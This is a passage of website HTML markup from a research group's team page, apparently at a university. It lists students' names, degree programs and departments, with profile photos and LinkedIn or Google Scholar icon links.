h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-856 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-852 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-857 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-854 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-902 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-855 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 